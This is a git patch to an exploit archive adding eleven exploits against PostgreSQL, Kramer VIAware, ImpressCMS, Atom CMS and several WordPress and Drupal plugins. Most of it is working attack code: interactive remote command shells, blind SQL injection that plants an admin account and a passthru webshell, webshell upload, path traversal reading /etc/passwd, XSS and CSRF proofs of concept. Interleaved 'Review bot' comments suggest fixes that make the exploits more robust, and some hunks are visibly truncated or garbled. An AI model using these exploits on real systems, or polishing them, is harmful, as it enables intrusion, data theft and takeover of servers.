From 54b7907ae60a88d674d975798b771129321db753 Mon Sep 17 00:00:00 2001 
From: Offensive Security Date: Thu, 31 Mar 2022 05:01:38 +0000 Subject: [PATCH] DB: 2022-03-31 11 changes to exploits/shellcodes PostgreSQL 9.3-11.7 - Remote Code Execution (RCE) (Authenticated) Kramer VIAware 2.5.0719.1034 - Remote Code Execution (RCE) ImpressCMS 1.4.2 - Remote Code Execution (RCE) Atom CMS 2.0 - Remote Code Execution (RCE) Drupal avatar_uploader v7.x-1.0-beta8 - Cross Site Scripting (XSS) WordPress Plugin Curtain 1.0.2 - Cross-site Request Forgery (CSRF) WordPress Plugin cab-fare-calculator 1.0.3 - Local File Inclusion WordPress Plugin video-synchro-pdf 1.7.4 - Local File Inclusion WordPress Plugin admin-word-count-column 2.2 - Local File Read CSZ CMS 1.2.9 - 'Multiple' Blind SQLi(Authenticated) WordPress Plugin Easy Cookie Policy 1.6.2 - Broken Access Control to Stored XSS --- exploits/hardware/remote/50848.py | 111 +++++++++++++++++ exploits/multiple/remote/50847.py | 113 ++++++++++++++++++ exploits/php/webapps/50839.php | 191 ++++++++++++++++++++++++++++++ exploits/php/webapps/50840.py | 110 +++++++++++++++++ exploits/php/webapps/50841.txt | 13 ++ exploits/php/webapps/50842.txt | 29 +++++ exploits/php/webapps/50843.txt | 32 +++++ exploits/php/webapps/50844.txt | 27 +++++ exploits/php/webapps/50845.txt | 31 +++++ exploits/php/webapps/50846.txt | 25 ++++ exploits/php/webapps/50849.txt | 27 +++++ files_exploits.csv | 11 ++ 12 files changed, 720 insertions(+) create mode 100755 exploits/hardware/remote/50848.py create mode 100755 exploits/multiple/remote/50847.py create mode 100644 exploits/php/webapps/50839.php create mode 100755 exploits/php/webapps/50840.py create mode 100644 exploits/php/webapps/50841.txt create mode 100644 exploits/php/webapps/50842.txt create mode 100644 exploits/php/webapps/50843.txt create mode 100644 exploits/php/webapps/50844.txt create mode 100644 exploits/php/webapps/50845.txt create mode 100644 exploits/php/webapps/50846.txt create mode 100644 exploits/php/webapps/50849.txt 
diff --git a/exploits/hardware/remote/50848.py b/exploits/hardware/remote/50848.py
new file mode 100755
index 000000000..510d6ae2c
--- /dev/null
+++ b/exploits/hardware/remote/50848.py
@@ -0,0 +1,111 @@ +# Exploit Title: Kramer VIAware 2.5.0719.1034 - Remote Code Execution (RCE) +# Date: 28/03/2022 +# Exploit Author: sharkmoos & BallO +# Vendor Homepage: https://www.kramerav.com/ +# Software Link: https://www.kramerav.com/us/product/viaware +# Version: 2.5.0719.1034 +# Tested on: ViaWare Go (Windows 10) +# CVE : CVE-2019-17124 + +import requests, sys, urllib3 +urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) + +def adminLogin(s, host, username, password): + headers = { + "Host": f"{host}", + "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:98.0) Gecko/20100101 Firefox/98.0", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8", + "Accept-Language": "en-GB,en;q=0.5", + "Accept-Encoding": "gzip, deflate", + "Content-Type": "application/x-www-form-urlencoded", + "Origin": f"https://{host}", + "Referer": f"https://{host}/admin/login.php", + "Upgrade-Insecure-Requests": "1", + "Sec-Fetch-Dest": "document", + "Sec-Fetch-Mode": "navigate", + "Sec-Fetch-Site": "same-origin", + "Sec-Fetch-User": "?1", + "Sec-Gpc": "1", + "Te": "trailers", + "Connection": "close" + } + data = { + "txtUserId": username, + "txtPwd": password, + "btnOk" :"Login" + } + response = s.post(f"https://{host}/admin/login.php", verify=False) + if len(s.cookies) < 1: + return False + else: + return True + + +def writeCommand(session, host, command): + headers = { + "Host": f"{host}", + "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:98.0) Gecko/20100101 Firefox/98.0", + "Accept": "text/html, */*", + "Accept-Language": "en-GB,en;q=0.5", + "Accept-Encoding": "gzip, deflate", + "Content-Type": "application/x-www-form-urlencoded", + "X-Requested-With": "XMLHttpRequest", + "Origin": f"https://{host}", + "Referer": f"https://{host}/browseSystemFiles.php?path=C:\Windows&icon=browser", + "Sec-Fetch-Dest": "empty", + "Sec-Fetch-Mode": "cors", + "Sec-Fetch-Site": "same-origin", + "Sec-Gpc": "1", + "Te": 
"trailers", + "Connection": "close" + } + data = { + "radioBtnVal":f"{command}", + "associateFileName": "C:/tc/httpd/cgi-bin/exploit.cmd" + } + session.post(f"https://{host}/ajaxPages/writeBrowseFilePathAjax.php", headers=headers, data=data) + + +def getResult(session, host): + file = session.get(f"https://{host}/cgi-bin/exploit.cmd", verify=False) + pageText = file.text + if len(pageText) < 1: + result = "Command did not return a result" + else: + result = pageText + return result + + + +def main(host, username="su", password="supass"): + s = requests.Session() + # comment this line to skip the login stage + loggedIn = adminLogin(s, host, username, password) + + if not loggedIn: + print("Could not successfully login as the admin") + sys.exit(1) + else: + pass + + command = "" + while command != "exit": + command = input("cmd:> ").strip() + writeCommand(s, host, command) + print(getResult(s, host)) + exit() + +if __name__ == "__main__": + + args = sys.argv + numArgs = len(args) + if numArgs < 2: + print(f"Run script in format:\n\n\tpython3 {args[0]} target\n") + print(f"[Optional] Provide Admin Credentials\n\n\tpython3 {args[0]} target su supass") + if numArgs == 2: + main(args[1]) + if numArgs == 4: + main(args[1], args[2], args[3]) + if numArgs > 4: + print(f"Run script in format:\n\n\tpython3 {args[0]} target\n") + print(f"[Optional] Provide Admin Credentials\n\n\tpython3 {args[0]} target su supass") \ No newline at end of file diff --git a/exploits/multiple/remote/50847.py b/exploits/multiple/remote/50847.py new file mode 100755 index 000000000..c2c13f4f1 --- /dev/null +++ b/exploits/multiple/remote/50847.py 
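Review bot: The `Referer` value in `writeCommand` embeds `C:\Windows` in an ordinary f-string, so `\W` is an invalid escape sequence that CPython reports as a DeprecationWarning (a SyntaxWarning from 3.12) and will eventually reject; make it a raw f-string, `"Referer": rf"https://{host}/browseSystemFiles.php?path=C:\Windows&icon=browser",`. The closing `if len(s.cookies) < 1: return False / else: return True` in `adminLogin` reduces to `return len(s.cookies) > 0`, and the name `loggedIn` in `main` should be documented as meaning only "the server set a cookie", which is all that check establishes. The module header should state the artifact the script leaves on the host, `C:/tc/httpd/cgi-bin/exploit.cmd`, since nothing in `main` removes it and it is the first thing an incident responder would look for. `main` terminates with a bare `exit()` while its failure path uses `sys.exit(1)`; use `sys.exit` in both places.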
@@ -0,0 +1,113 @@ +# Exploit Title: PostgreSQL 9.3-11.7 - Remote Code Execution (RCE) (Authenticated) +# Date: 2022-03-29 +# Exploit Author: b4keSn4ke +# Github: https://github.com/b4keSn4ke +# Vendor Homepage: https://www.postgresql.org/ +# Software Link: https://www.postgresql.org/download/linux/debian/ +# Version: 9.3 - 11.7 +# Tested on: Linux x86-64 - Debian 4.19 +# CVE: CVE-2019–9193 + +#!/usr/bin/python3 + +import psycopg2 +import argparse +import hashlib +import time + +def parseArgs(): + parser = argparse.ArgumentParser(description='CVE-2019–9193 - PostgreSQL 9.3-11.7 Authenticated Remote Code Execution') + parser.add_argument('-i', '--ip', nargs='?', type=str, default='127.0.0.1', help='The IP address of the PostgreSQL DB [Default: 127.0.0.1]') + parser.add_argument('-p', '--port', nargs='?', type=int, default=5432, help='The port of the PostgreSQL DB [Default: 5432]') + parser.add_argument('-d', '--database', nargs='?', default='template1', help='Name of the PostgreSQL DB [Default: template1]') + parser.add_argument('-c', '--command', nargs='?', help='System command to run') + parser.add_argument('-t', '--timeout', nargs='?', type=int, default=10, help='Connection timeout in seconds [Default: 10 (seconds)]') + parser.add_argument('-U', '--user', nargs='?', default='postgres', help='Username to use to connect to the PostgreSQL DB [Default: postgres]') + parser.add_argument('-P', '--password', nargs='?', default='postgres', help='Password to use to connect to the the PostgreSQL DB [Default: postgres]') + args = parser.parse_args() + return args + +def main(): + try: + print ("\r\n[+] Connecting to PostgreSQL Database on {0}:{1}".format(args.ip, args.port)) + connection = psycopg2.connect ( + database=args.database, + user=args.user, + password=args.password, + host=args.ip, + port=args.port, + connect_timeout=args.timeout + ) + print ("[+] Connection to Database established") + + print ("[+] Checking PostgreSQL version") + checkVersion(connection) + + 
if(args.command): + exploit(connection) + else: + print ("[+] Add the argument -c [COMMAND] to execute a system command") + + except psycopg2.OperationalError as e: + print ("\r\n[-] Connection to Database failed: \r\n{0}".format(e)) + exit() + +def checkVersion(connection): + cursor = connection.cursor() + cursor.execute("SELECT version()") + record = cursor.fetchall() + cursor.close() + + result = deserialize(record) + version = float(result[(result.find("PostgreSQL")+11):(result.find("PostgreSQL")+11)+4]) + + if (version >= 9.3 and version <= 11.7): + print("[+] PostgreSQL {0} is likely vulnerable".format(version)) + + else: + print("[-] PostgreSQL {0} is not vulnerable".format(version)) + exit() + +def deserialize(record): + result = "" + for rec in record: + result += rec[0]+"\r\n" + return result + +def randomizeTableName(): + return ("_" + hashlib.md5(time.ctime().encode('utf-8')).hexdigest()) + +def exploit(connection): + cursor = connection.cursor() + tableName = randomizeTableName() + try: + print ("[+] Creating table {0}".format(tableName)) + cursor.execute("DROP TABLE IF EXISTS {1};\ + CREATE TABLE {1}(cmd_output text);\ + COPY {1} FROM PROGRAM '{0}';\ + SELECT * FROM {1};".format(args.command,tableName)) + + print ("[+] Command executed\r\n") + + record = cursor.fetchall() + result = deserialize(record) + + print(result) + print ("[+] Deleting table {0}\r\n".format(tableName)) + + cursor.execute("DROP TABLE {0};".format(tableName)) + cursor.close() + + except psycopg2.errors.ExternalRoutineException as e: + print ("[-] Command failed : {0}".format(e.pgerror)) + print ("[+] Deleting table {0}\r\n".format(tableName)) + cursor = connection.cursor() + cursor.execute("DROP TABLE {0};".format(tableName)) + cursor.close() + + finally: + exit() + +if __name__ == "__main__": + args = parseArgs() + main() \ No newline at end of file diff --git a/exploits/php/webapps/50839.php b/exploits/php/webapps/50839.php new file mode 100644 index 000000000..7c6a8ce97 
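Review bot: `exploit` and `checkVersion` read the module-level `args` that the `__main__` guard assigns instead of receiving it as a parameter, so neither can be imported or tested in isolation and `main()` takes no arguments for the same reason; pass it explicitly, `def exploit(connection, args):`. The `finally: exit()` at the end of `exploit` terminates the interpreter from inside a helper on every path, including success, so nothing after `exploit(connection)` in `main` can ever run; move the `exit()` to `main` or drop it. The `#!/usr/bin/python3` shebang sits after the comment header rather than on line 1, where it has no effect, and the CVE identifier is written with an en dash (`CVE-2019–9193`) in both the header and the argparse description, so a plain-ASCII search for the CVE will not match this file. The header should also record that `COPY ... FROM PROGRAM` is available only to superusers and members of `pg_execute_server_program`, which is the privilege boundary a defender reviews; the hard-coded `postgres`/`postgres` defaults in `parseArgs` only matter where that boundary has been left open.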
--- /dev/null
+++ b/exploits/php/webapps/50839.php
@@ -0,0 +1,191 @@ +# Exploit Title: ImpressCMS 1.4.2 - Remote Code Execution (RCE) +# Exploit Author: Egidio Romano aka EgiX +# Date: 30/03/2022 +# Version: <= 1.4.2 +# Venor: https://www.impresscms.org +# CVE: CVE-2021-26599 + +"; + print "\nExample.: php $argv[0] http://localhost/impresscms/"; + print "\nExample.: php $argv[0] https://www.impresscms.org/\n\n"; + die(); +} + +$url = $argv[1]; +$ch = curl_init(); + +curl_setopt($ch, CURLOPT_HEADER, true); +curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); +curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); + +print "\n[+] Retrieving security token (CVE-2021-26598)\n"; + +curl_setopt($ch, CURLOPT_URL, "{$url}misc.php?action=showpopups&type=friend"); + +$res = curl_exec($ch); + +if (!preg_match("/(cookie: [^;]+); path/i", $res, $sid)) die("[-] Session coookie not found!\n"); +if (!preg_match("/TOKEN_REQUEST' value='([^']+)'/", $res, $token)) die("[-] Token not found!\n"); + +print "[+] Starting SQL Injection attack (CVE-2021-26599)\n"; +print "[*] Step 1: retrieving database name\n"; + +curl_setopt($ch, CURLOPT_URL, "{$url}include/findusers.php"); +curl_setopt($ch, CURLOPT_HTTPHEADER, [$sid[1]]); + +$params = "user_submit=1&token={$token[1]}&groups[]=%s"; + +$min = true; +$idx = 1; + +while(1) +{ + $test = 256; + + for ($i = 7; $i >= 0; $i--) + { + $test = $min ? ($test - pow(2, $i)) : ($test + pow(2, $i)); + $sql = "1) AND ORD(SUBSTR(DATABASE(),{$idx},1))<{$test}#"; + curl_setopt($ch, CURLOPT_POSTFIELDS, sprintf($params, urlencode($sql))); + $min = !preg_match("/No Users Found/", curl_exec($ch)); + } + + if (($chr = $min ? 
($test - 1) : ($test)) == 0) break; + $dbname .= chr($chr); $min = true; $idx++; + print "\r[+] DB name: {$dbname}"; +} + +print "\n[*] Step 2: retrieving tables prefix\n"; + +$sub = "SELECT TRIM(TRAILING 'users' FROM table_name) FROM information_schema.tables WHERE table_schema='{$dbname}' AND table_name LIKE '%users'"; +$min = true; +$idx = 1; + +while(1) +{ + $test = 256; + + for ($i = 7; $i >= 0; $i--) + { + $test = $min ? ($test - pow(2, $i)) : ($test + pow(2, $i)); + $sql = hex_enc("SELECT IF(ORD(SUBSTR(({$sub}),{$idx},1))<{$test},1,SLEEP(1))"); + $sql = "0); SET @q = {$sql}; PREPARE stmt FROM @q; EXECUTE stmt;#"; + curl_setopt($ch, CURLOPT_POSTFIELDS, sprintf($params, urlencode($sql))); + $start = time(); curl_exec($ch); $secs = time() - $start; + $min = ($secs < 2); + } + + if (($chr = $min ? ($test - 1) : ($test)) == 0) break; + $prefix .= chr($chr); $min = true; $idx++; + print "\r[+] Prefix: {$prefix}"; +} + +print "\n[*] Step 3: creating new admin user\n"; + +$uid = time(); +$enc = hex_enc("egix"); +$pwd = hex_enc(md5("egix")); +$sql = "0); INSERT INTO {$prefix}users (uid, uname, login_name, pass, level, enc_type) VALUES ({$uid}, {$enc}, {$enc}, {$pwd}, 5, 0)#"; + +curl_setopt($ch, CURLOPT_POSTFIELDS, sprintf($params, urlencode($sql))); +curl_exec($ch); + +$sql = "0); INSERT INTO {$prefix}groups_users_link (groupid, uid) VALUES (1, {$uid})#"; + +curl_setopt($ch, CURLOPT_POSTFIELDS, sprintf($params, urlencode($sql))); +curl_exec($ch); + +print "[+] Trying to login as the new user\n"; + +curl_setopt($ch, CURLOPT_URL, "{$url}user.php"); +curl_setopt($ch, CURLOPT_POSTFIELDS, "uname=egix&pass=egix&op=login"); + +if (!preg_match("/(cookie: [^;]+); path/i", curl_exec($ch), $sid)) die("[-] Login failed!\n"); + +print "[+] Creating malicious autotask\n"; + +$phpcode = urlencode("if (isset(\$_SERVER[HTTP_CMD])) { print(____); passthru(base64_decode(\$_SERVER[HTTP_CMD])); die; }"); + +curl_setopt($ch, CURLOPT_URL, "{$url}modules/system/admin.php"); 
+curl_setopt($ch, CURLOPT_HTTPHEADER, [$sid[1], "Referer: {$url}"]); +curl_setopt($ch, CURLOPT_POSTFIELDS, "fct=autotasks&sat_name=rce&sat_code={$phpcode}&sat_enabled=1&op=addautotasks"); + +if (!preg_match("/HTTP.*302/i", curl_exec($ch))) die("[-] Something went wrong!\n"); + +print "[+] Launching shell\n"; + +curl_setopt($ch, CURLOPT_URL, $url); +curl_setopt($ch, CURLOPT_POST, false); + +while(1) +{ + print "\nimpresscms-shell# "; + if (($cmd = trim(fgets(STDIN))) == "exit") break; + curl_setopt($ch, CURLOPT_HTTPHEADER, ["CMD: ".base64_encode($cmd)]); + preg_match('/____(.*)/s', curl_exec($ch), $m) ? print $m[1] : die("\n[-] Exploit failed!\n"); +} \ No newline at end of file diff --git a/exploits/php/webapps/50840.py b/exploits/php/webapps/50840.py new file mode 100755 index 000000000..7becb4e0e --- /dev/null +++ b/exploits/php/webapps/50840.py 
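Review bot: `$dbname` and `$prefix` are first used with `.=` inside the two extraction loops without being initialised, which PHP reports as an undefined-variable notice on the first iteration; add `$dbname = "";` and `$prefix = "";` before the respective `while(1)`. The start of the file (the `<?php` tag, the usage block whose tail survives as `"; print "\nExample.: ...`, and the `hex_enc()` helper the loops call) is not visible in this hunk, presumably lost when the diff was rendered, so the hunk as shown does not parse on its own. The header comment should list the persistent changes the script makes to the target — the account `egix` inserted into `{$prefix}users` with group 1 and the enabled autotask named `rce` — because nothing in the file removes them and they are exactly what a responder needs to find during cleanup. The `$sid` cookie captured at login and the `CMD:` request header the shell loop sends are likewise worth stating in the header as the request-level indicators of this script.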
@@ -0,0 +1,110 @@ +# Exploit Title: Atom CMS 2.0 - Remote Code Execution (RCE) +# Date: 22.03.2022 +# Exploit Author: Ashish Koli (Shikari) +# Vendor Homepage: https://thedigitalcraft.com/ +# Software Link: https://github.com/thedigicraft/Atom.CMS +# Version: 2.0 +# Tested on: Ubuntu 20.04.3 LTS +# CVE: CVE-2022-25487 + +# Description +This script uploads webshell.php to the Atom CMS. An application will store that file in the uploads directory with a unique number which allows us to access Webshell. + +# Usage : python3 exploit.py +# Example: python3 exploit.py 127.0.0.1 80 /atom + +# POC Exploit: https://youtu.be/qQrq-eEpswc +# Note: Crafted "Shell.txt" file is required for exploitation which is available on the below link: +# https://github.com/shikari00007/Atom-CMS-2.0---File-Upload-Remote-Code-Execution-Un-Authenticated-POC + +''' +Description: +A file upload functionality in Atom CMS 2.0 allows any +non-privileged user to gain access to the host through the uploaded files, +which may result in remote code execution. 
+''' + +#!/usr/bin/python3 +''' +Import required modules: +''' +import sys +import requests +import json +import time +import urllib.parse +import struct +import re +import string +import linecache + + + +proxies = { + 'http': 'http://localhost:8080', + 'https': 'https://localhost:8080', +} + +''' +User Input: +''' +target_ip = sys.argv[1] +target_port = sys.argv[2] +atomcmspath = sys.argv[3] + + +''' +Get cookie +''' +session = requests.Session() +link = 'http://' + target_ip + ':' + target_port + atomcmspath + '/admin' +response = session.get(link) +cookies_session = session.cookies.get_dict() +cookie = json.dumps(cookies_session) +cookie = cookie.replace('"}','') +cookie = cookie.replace('{"', '') +cookie = cookie.replace('"', '') +cookie = cookie.replace(" ", '') +cookie = cookie.replace(":", '=') + +''' +Upload Webshell: +''' +# Construct Header: +header1 = { + 'Host': target_ip, + 'Accept': 'application/json', + 'Cache-Control': 'no-cache', + 'X-Requested-With': 'XMLHttpRequest', + 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36', + 'Content-Type': 'multipart/form-data; boundary=----WebKitFormBoundaryH7Ak5WhirAIQ8o1L', + 'Origin': 'http://' + target_ip, + 'Referer': 'http://' + target_ip + ':' + target_port + atomcmspath + '/admin/index.php?page=users&id=1', + 'Accept-Encoding': 'gzip, deflate', + 'Accept-Language': 'en-US,en;q=0.9', + 'Cookie': cookie, + 'Connection': 'close', + +} + + +# loading Webshell payload: +path = 'shell.txt' +fp = open(path,'rb') +data= fp.read() + + +# Uploading Webshell: +link_upload = 'http://' + target_ip + ':' + target_port + atomcmspath + '/admin/uploads.php?id=1' +upload = requests.post(link_upload, headers=header1, data=data) + +p=upload.text +x = re.sub("\s", "\n", p) +y = x.replace("1
Unknown", "null") +z = re.sub('[^0-9]', '', y) + +''' +Finish: +''' +print('Uploaded Webshell to: http://' + target_ip + ':' + target_port + atomcmspath + '/uploads/' + z + '.php') +print('') \ No newline at end of file diff --git a/exploits/php/webapps/50841.txt b/exploits/php/webapps/50841.txt new file mode 100644 index 000000000..c702534a4 --- /dev/null +++ b/exploits/php/webapps/50841.txt @@ -0,0 +1,13 @@ +# Exploit Title: Drupal avatar_uploader v7.x-1.0-beta8 - Cross Site Scripting (XSS) +# Date: 2022-03-22 +# Author: Milad karimi +# Software Link: https://www.drupal.org/project/avatar_uploader +# Version: v7.x-1.0-beta8 +# Tested on: Windows 10 +# CVE: N/A + +1. Description: +This plugin creates a avatar_uploader from any post types. The slider import search feature and tab parameter via plugin settings are vulnerable to reflected cross-site scripting. + +2. Proof of Concept: +http://$target/avatar_uploader.pages.inc?file= \ No newline at end of file diff --git a/exploits/php/webapps/50842.txt b/exploits/php/webapps/50842.txt new file mode 100644 index 000000000..6386f74fd --- /dev/null +++ b/exploits/php/webapps/50842.txt @@ -0,0 +1,29 @@ +# Exploit Title: WordPress Plugin Curtain 1.0.2 - Cross-site Request Forgery (CSRF) +# Date: 24-03-2022 +# Exploit Author: Hassan Khan Yusufzai - Splint3r7 +# Vendor Homepage: https://wordpress.org/plugins/curtain/ +# Version: 1.0.2 +# Tested on: Firefox + +## Summary: + +Cross site forgery vulnerability has been identified in curtain WordPress plugin that allows an attacker to to activate or deactivate sites maintenance mode. + +## Vulnerable URL: + +http://localhost:10003/wp-admin/options-general.php?page=curtain&_wpnonce=&mode=0 + +## CSRF POC Exploit + +``` + + +
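Review bot: `fp = open(path,'rb')` is never closed; use `with open(path, 'rb') as fp: data = fp.read()`. Of the imports, `time`, `urllib.parse`, `struct`, `string` and `linecache` are never used, the `proxies` dict is defined but never passed to any request, and the `#!/usr/bin/python3` line sits after the header comment where it has no effect. The cookie string is assembled by mangling `json.dumps(session.cookies.get_dict())` with five `replace` calls; `'; '.join(f'{k}={v}' for k, v in cookies_session.items())` says the same thing directly, or post through `session`, which already carries the cookie, instead of `requests.post`. `sys.argv[1:4]` are read without a length check, so running the script with no arguments dies with an `IndexError` rather than a usage message, and `re.sub("\s", ...)` should use a raw pattern, `r"\s"`.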
+ + + + +
+ + +``` \ No newline at end of file diff --git a/exploits/php/webapps/50843.txt b/exploits/php/webapps/50843.txt new file mode 100644 index 000000000..1676fce48 --- /dev/null +++ b/exploits/php/webapps/50843.txt @@ -0,0 +1,32 @@ +# Exploit Title: WordPress Plugin cab-fare-calculator 1.0.3 - Local File Inclusion +# Google Dork: inurl:/wp-content/plugins/cab-fare-calculator/ +# Date: 24-03-2022 +# Exploit Author: Hassan Khan Yusufzai - Splint3r7 +# Vendor Homepage: https://wordpress.org/plugins/cab-fare-calculator/ +# Version: 1.0.3 +# Tested on: Firefox +# Vulnerable File: tblight.php + +# Impact: + +Local File Read / Code Execution + +# Vulnerable Code: + +``` +if(!empty($_GET['controller']) && !empty($_GET['action']) && +!empty($_GET['ajax']) && $_GET['ajax'] == 1) +{ + require_once('' . 'controllers/'.$_GET['controller'].'.php'); +} +``` + +# Proof of concept: + +http://localhost:10003/wp-content/plugins/cab-fare-calculator/tblight.php?controller=../../../../../../../../../../../etc/index&action=1&ajax=1 + +# POC Code Execution: + +/etc/index.php: + + \ No newline at end of file diff --git a/exploits/php/webapps/50844.txt b/exploits/php/webapps/50844.txt new file mode 100644 index 000000000..3a9e6337e --- /dev/null +++ b/exploits/php/webapps/50844.txt @@ -0,0 +1,27 @@ +# Exploit Title: WordPress Plugin video-synchro-pdf 1.7.4 - Local File Inclusion +# Google Dork: inurl:/wp-content/plugins/video-synchro-pdf/ +# Date: 26-03-2022 +# Exploit Author: Hassan Khan Yusufzai - Splint3r7 +# Vendor Homepage: https://wordpress.org/plugins/video-synchro-pdf/ +# Version: 1.7.4 +# Tested on: Firefox + +# Vulnerable File: video-synchro-pdf/reglages/Menu_Plugins/tout.php + +# Vulnerable Code: + +``` +[LFI] + +Contents of index.php: \ No newline at end of file diff --git a/exploits/php/webapps/50845.txt b/exploits/php/webapps/50845.txt new file mode 100644 index 000000000..149b1ec17 --- /dev/null +++ b/exploits/php/webapps/50845.txt 
@@ -0,0 +1,31 @@ +# Exploit Title: WordPress Plugin admin-word-count-column 2.2 - Local File Read +# Google Dork: inurl:/wp-content/plugins/admin-word-count-column/ +# Date: 27-03-2022 +# Exploit Author: Hassan Khan Yusufzai - Splint3r7 +# Vendor Homepage: https://wordpress.org/plugins/admin-word-count-column/ +# Version: 2.2 +# Contact me: h [at] spidersilk.com + +# PHP version: 5.3.2 or below + +# Vulnerable File: plugins/admin-word-count-column/download-csv.php + +# Vulnerable Code: + +``` + +``` + +# Proof of Concept: + +localhost/wp-content/plugins/admin-word-count-column/download-csv.php?path=../../../../../../../../../../../../etc/passwd\0 + +Note: Null byte injection will only working in php 5.3.2 and below 5.3.2. \ No newline at end of file diff --git a/exploits/php/webapps/50846.txt b/exploits/php/webapps/50846.txt new file mode 100644 index 000000000..d3d27ab42 --- /dev/null +++ b/exploits/php/webapps/50846.txt 
@@ -0,0 +1,25 @@ +# Exploit Title: CSZ CMS 1.2.9 - 'Multiple' Blind SQLi(Authenticated) +# Date: 2021-04-14 +# Exploit Author: Rahad Chowdhury +# Vendor Homepage: https://www.cszcms.com/ +# Software Link: https://sourceforge.net/projects/cszcms/files/install/CSZCMS-V1.2.9.zip +# Version: 1.2.9 +# Tested on: Windows 10, Kali Linux, PHP 7.4.16, Apache 2.4.46 +# CVE: CVE-2021-43701 + +*Steps to Reproduce:* +1. First login to your Admin Panel +2. then go to "General Menu > CSV Export / Import". +3. open burp site and configure with browser. +4. then select any "Table Name" > Select "Fields Select" and Select "Sort by" +5. Now click "Export to CSV" and intercept with burp suite +6. "fieldS[]" or "orderby" parameter is vulnerable. Let's try to inject Blind SQL Injection using this query "(select(0)from(select(sleep(10)))a)" in "orderby" parameter. + +*Proof of Concept:* +http://127.0.0.1/CSZCMS/admin/export/getcsv/article_db?fieldS%5B%5D=article_db_id&orderby=(select(0)from(select(sleep(10)))a)&sort=ASC&submit=Export+to+CSV + +*Output:* +By issuing sleep(0) response will be delayed to 0 seconds. +By issuing sleep(1) response will be delayed to 1 seconds. +By issuing sleep(5) response will be delayed to 5 seconds. +By issuing sleep(10) response will be delayed to 10 seconds \ No newline at end of file diff --git a/exploits/php/webapps/50849.txt b/exploits/php/webapps/50849.txt new file mode 100644 index 000000000..be8555b43 --- /dev/null +++ b/exploits/php/webapps/50849.txt 
@@ -0,0 +1,27 @@ +# Exploit Title: WordPress Plugin Easy Cookie Policy 1.6.2 - Broken Access Control to Stored XSS +# Date: 2/27/2021 +# Author: 0xB9 +# Software Link: https://wordpress.org/plugins/easy-cookies-policy/ +# Version: 1.6.2 +# Tested on: Windows 10 +# CVE: CVE-2021-24405 + +1. Description: +Broken access control allows any authenticated user to change the cookie banner through a POST request to admin-ajax.php. +If users can't register, this can be done through CSRF. + +2. Proof of Concept: +POST http://localhost/wp-admin/admin-ajax.php HTTP/1.1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:86.0) Gecko/20100101 Firefox/86.0 +Accept: application/json, text/javascript, /; q=0.01 +Accept-Language: en-US,en;q=0.5 +Referer: http://localhost/wp-admin/options-general.php?page=easy-cookies-policy +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +X-Requested-With: XMLHttpRequest +Content-Length: 226 +Origin: http://localhost +Connection: keep-alive +Host: localhost +Cookie: [Any authenticated user] + +action=easy_cookies_policy_save_settings&maintext=&background=black&transparency=90&close=accept&expires=365&enabled=true&display=fixed&position=top&button_text=Accept&text_color=#dddddd \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 8b9b8a9aa..208e15cac 100644 --- a/files_exploits.csv +++ b/files_exploits.csv 
@@ -18656,6 +18656,8 @@ id,file,description,date,author,type,platform,port
 50833,exploits/multiple/remote/50833.txt,"Ivanti Endpoint Manager 4.6 - Remote Code Execution (RCE)",1970-01-01,d7x,remote,multiple,
 50835,exploits/hardware/remote/50835.txt,"ICT Protege GX/WX 2.08 - Stored Cross-Site Scripting (XSS)",1970-01-01,LiquidWorm,remote,hardware,
 50836,exploits/hardware/remote/50836.txt,"ICT Protege GX/WX 2.08 - Client-Side SHA1 Password Hash Disclosure",1970-01-01,LiquidWorm,remote,hardware,
+50847,exploits/multiple/remote/50847.py,"PostgreSQL 9.3-11.7 - Remote Code Execution (RCE) (Authenticated)",1970-01-01,b4keSn4ke,remote,multiple,
+50848,exploits/hardware/remote/50848.py,"Kramer VIAware 2.5.0719.1034 - Remote Code Execution (RCE)",1970-01-01,sharkmoos,remote,hardware,
 6,exploits/php/webapps/6.php,"WordPress Core 2.0.2 - 'cache' Remote Shell Injection",1970-01-01,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",1970-01-01,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",1970-01-01,Spoofed,webapps,php,
@@ -44906,3 +44908,12 @@ id,file,description,date,author,type,platform,port
 50828,exploits/php/webapps/50828.sh,"Tiny File Manager 2.4.6 - Remote Code Execution (RCE)",1970-01-01,"FEBIN MON SAJI",webapps,php,
 50830,exploits/php/webapps/50830.txt,"Wordpress Plugin iQ Block Country 1.2.13 - Arbitrary File Deletion via Zip Slip (Authenticated)",1970-01-01,"Ceylan BOZOĞULLARINDAN",webapps,php,
 50838,exploits/php/webapps/50838.txt,"WordPress Plugin amministrazione-aperta 3.7.3 - Local File Read - Unauthenticated",1970-01-01,"Hassan Khan Yusufzai",webapps,php,
+50839,exploits/php/webapps/50839.php,"ImpressCMS 1.4.2 - Remote Code Execution (RCE)",1970-01-01,"Egidio Romano",webapps,php,
+50840,exploits/php/webapps/50840.py,"Atom CMS 2.0 - Remote Code Execution (RCE)",1970-01-01,"Ashish Koli",webapps,php,
+50841,exploits/php/webapps/50841.txt,"Drupal avatar_uploader v7.x-1.0-beta8 - Cross Site Scripting (XSS)",1970-01-01,"Milad karimi",webapps,php,
+50842,exploits/php/webapps/50842.txt,"WordPress Plugin Curtain 1.0.2 - Cross-site Request Forgery (CSRF)",1970-01-01,"Hassan Khan Yusufzai",webapps,php,
+50843,exploits/php/webapps/50843.txt,"WordPress Plugin cab-fare-calculator 1.0.3 - Local File Inclusion",1970-01-01,"Hassan Khan Yusufzai",webapps,php,
+50844,exploits/php/webapps/50844.txt,"WordPress Plugin video-synchro-pdf 1.7.4 - Local File Inclusion",1970-01-01,"Hassan Khan Yusufzai",webapps,php,
